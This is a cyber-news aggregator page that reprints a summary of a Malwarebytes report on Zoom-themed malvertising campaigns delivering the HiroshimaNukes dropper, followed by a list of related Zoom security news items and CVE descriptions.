Malvertisers zoom in on cryptocurrencies and initial access

While Zoom is used by millions of people around the world, these campaigns are likely targeting victims who are into cryptocurrencies as well as corporate users, in order to gain access to company networks.
The threat actors are using a number of fake identities to create multiple advertiser accounts.
While we don't know how many people may have fallen for these Zoom malvertising campaigns, we can say that the number of ads and their positioning was prominent enough to generate a substantial amount of traffic.
The threat actors are using tracking templates to cloak the redirection mechanism to either the legitimate Zoom website or a site or their choosing.
HiroshimaNukes is a name given by its author to a piece of malware that was new to us.
Its goal is to drop additional malware, typically a stealer followed by data exfiltration.
DLL side-loading is a technique used by threat actors to bypass detection.
While DLL side-loading is commonly used by malware authors, it is also a unique TTP that we don't see in all malvertising campaigns.
We were able to search for previous similar attacks from the same threat actor.
The threat actors are tracking victims from their campaigns using a control panel called Hunting panel 1.40 which was new to us.
Malware payload. The malicious installer contains several files but the malicious components reside in the PowerShell scripts.
This technique has been used by the threat actor for months already, probably because they get higher infection rates than with a traditional malware binary.
The Base64-encoded PowerShell reveals the malware's command and control server as well as a number of other commands such as reporting telemetry back about the machine and any security software installed, and more importantly a GPG encrypted payload decoded on the fly.
We surmise this is a way for the threat actor to track their malvertising and payload delivery campaigns.
The panel's background image is from the Firewatch video game.
Malvertising continues to be a privileged malware delivery vector where threat actors are able to bypass ad verification checks, and often times security solutions as well.
We are actively tracking and reporting each new malvertising campaign we come across.
As we can't always control when third parties will take action on malicious ads, our top priority is to ensure our customers remain protected by blocking new malware domains and samples.
Both our consumer and enterprise users are protected agains these threats.
We would like to thank Sergei Frankoff, malware researcher and a co-founder of Open Analysis, for his help with the HiroshimaNukes dropper.


This Cyber News was published on www.malwarebytes.com. Publication date: Wed, 13 Dec 2023 17:13:04 +0000


Cyber News related to Malvertisers zoom in on cryptocurrencies and initial access

Zoom flaw enabled hijacking of accounts with access to meetings, team chat - A Zoom flaw that enabled the hijacking of service accounts with access to potentially confidential information was disclosed by bug hunters this week. The vulnerability in the Zoom Rooms feature mostly affected Zoom tenants using email addresses from ...
1 year ago Packetstormsecurity.com
CVE-2021-34423 - A buffer overflow vulnerability was discovered in Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4, Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1, Zoom Client for ...
2 years ago
CVE-2021-34424 - A vulnerability was discovered in the Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4, Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1, Zoom Client for Meetings for intune ...
2 years ago
Zoom Mobile & Desktop App Flaw Let Attackers Escalate Privileges - The popular video conferencing software Zoom has security issues with its desktop and mobile apps that could allow for privilege escalation. An attacker may be able to obtain elevated privileges within the application or the operating system by ...
1 year ago Cybersecuritynews.com
Zoom Launches AI Companion, Available at No Additional Cost - Zoom has pledged to provide artificial intelligence functions on its video-conferencing platform at no additional cost to paid clients. The tech firm believes that including these extra features as part of its paid platform service will provide a ...
11 months ago Cysecurity.news
Malvertisers zoom in on cryptocurrencies and initial access - While Zoom is used by millions of people around the world, these campaigns are likely targeting victims who are into cryptocurrencies as well as corporate users, in order to gain access to company networks. The threat actors are using a number of ...
1 year ago Malwarebytes.com
Zoom stomps critical privilege escalation bug, 6 other flaws The Register - Review and manage your consent Here's an overview of our use of cookies, similar technologies and how to manage them. Video conferencing giant Zoom today opened up about a fresh batch of security vulnerabilities affecting its products, including a ...
10 months ago Go.theregister.com
Weekly Vulnerability Recap 2/19/2024: News from Microsoft, Zoom, SolarWinds - While this week was a little light on vulnerability news, it's still been significant, with Microsoft's Patch Tuesday happening as well as updates for major products, like Zoom. Akira ransomware vulnerabilities have also surfaced in older Cisco ...
10 months ago Esecurityplanet.com
Ransomware Actor Uses TeamViewer to Gain Initial Access to Networks - TeamViewer is software that organizations have long used to enable remote support, collaboration, and access to endpoint devices. Like other legitimate remote access technologies, it is also something that attackers have used with relative frequency ...
11 months ago Darkreading.com
CVE-2022-28762 - Zoom Client for Meetings for macOS (Standard and for IT Admin) starting with 5.10.6 and prior to 5.12.0 contains a debugging port misconfiguration. When camera mode rendering context is enabled as part of the Zoom App Layers API by running certain ...
2 years ago
CVE-2023-22880 - Zoom for Windows clients before version 5.13.3, Zoom Rooms for Windows clients before version 5.13.5 and Zoom VDI for Windows clients before 5.13.1 contain an information disclosure vulnerability. A recent update to the Microsoft Edge WebView2 ...
1 year ago
Data thieves abuse Microsoft's 'verified publisher' status The Register - Miscreants using malicious OAuth applications abused Microsoft's "Verified publisher" status to gain access to organizations' cloud environments, then steal data and pry into to users' mailboxes, calendars, and meetings. According to researchers with ...
1 year ago Packetstormsecurity.com
CVE-2021-34418 - The login routine of the web console in the Zoom On-Premise Meeting Connector before version 4.6.239.20200613, Zoom On-Premise Meeting Connector MMR before version 4.6.239.20200613, Zoom On-Premise Recording Connector before version 3.8.42.20200905, ...
3 years ago
CVE-2021-34417 - The network proxy page on the web portal for the Zoom On-Premise Meeting Connector Controller before version 4.6.365.20210703, Zoom On-Premise Meeting Connector MMR before version 4.6.365.20210703, Zoom On-Premise Recording Connector before version ...
3 years ago
CVE-2021-34414 - The network proxy page on the web portal for the Zoom on-premise Meeting Connector Controller before version 4.6.348.20201217, Zoom on-premise Meeting Connector MMR before version 4.6.348.20201217, Zoom on-premise Recording Connector before version ...
3 years ago
CVE-2021-34416 - The network address administrative settings web portal for the Zoom on-premise Meeting Connector before version 4.6.360.20210325, Zoom on-premise Meeting Connector MMR before version 4.6.360.20210325, Zoom on-premise Recording Connector before ...
3 years ago
CVE-2022-22785 - The Zoom Client for Meetings (for Android, iOS, Linux, MacOS, and Windows) before version 5.10.0 failed to properly constrain client session cookies to Zoom domains. This issue could be used in a more sophisticated attack to send an unsuspecting ...
2 years ago
CVE-2022-22788 - The Zoom Opener installer is downloaded by a user from the Launch meeting page, when attempting to join a meeting without having the Zoom Meeting Client installed. The Zoom Opener installer for Zoom Client for Meetings before version 5.10.3 and Zoom ...
2 years ago
Best Platform To Catch Up on Crypto News? - That is why crypto publications such as InsideBitcoins.com are getting a lot of traction. These guides give a complete analysis of new and old cryptocurrencies through multiple perspectives. Crypto price predictions are where InsideBitcoins.com's ...
1 year ago Hackread.com
CVE-2023-34120 - Improper privilege management in Zoom for Windows, Zoom Rooms for Windows, and Zoom VDI for Windows clients before 5.14.0 may allow an authenticated user to potentially enable an escalation of privilege via local access. Users may potentially ...
1 year ago
Zoom's Bug-Scoring System Prioritizes Riskiest Vulns for Cyber Teams - Videoconferencing company Zoom has rolled out a new vulnerability scoring system that promises to help cybersecurity teams prioritize resources against the most dangerous threats. Still in its 1.0 version, the Vulnerability Impact Scoring System is ...
1 year ago Darkreading.com
CVE-2021-30480 - Zoom Chat through 2021-04-09 on Windows and macOS allows certain remote authenticated attackers to execute arbitrary code without user interaction. An attacker must be within the same organization, or an external party who has been accepted as a ...
3 years ago
CVE-2022-22782 - The Zoom Client for Meetings for Windows prior to version 5.9.7, Zoom Rooms for Conference Room for Windows prior to version 5.10.0, Zoom Plugins for Microsoft Outlook for Windows prior to version 5.10.3, and Zoom VDI Windows Meeting Clients prior to ...
1 year ago
Buzzing on Christmas Eve: Trigona Ransomware in 3 Hours - In late December 2022, we observed threat actors exploiting a publicly exposed Remote Desktop Protocol host, leading to data exfiltration and the deployment of Trigona ransomware. On Christmas Eve, within just three hours of gaining initial access, ...
10 months ago Thedfirreport.com
Microsoft Implements Disablement of Widely Exploited MSIX App Installer Protocol Due to Malware Attacks - On Thursday, Microsoft announced the reactivation of the ms-appinstaller protocol handler, reverting it to its default state due to widespread exploitation by various threat actors for malware dissemination. The Microsoft Threat Intelligence team ...
11 months ago Cysecurity.news

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)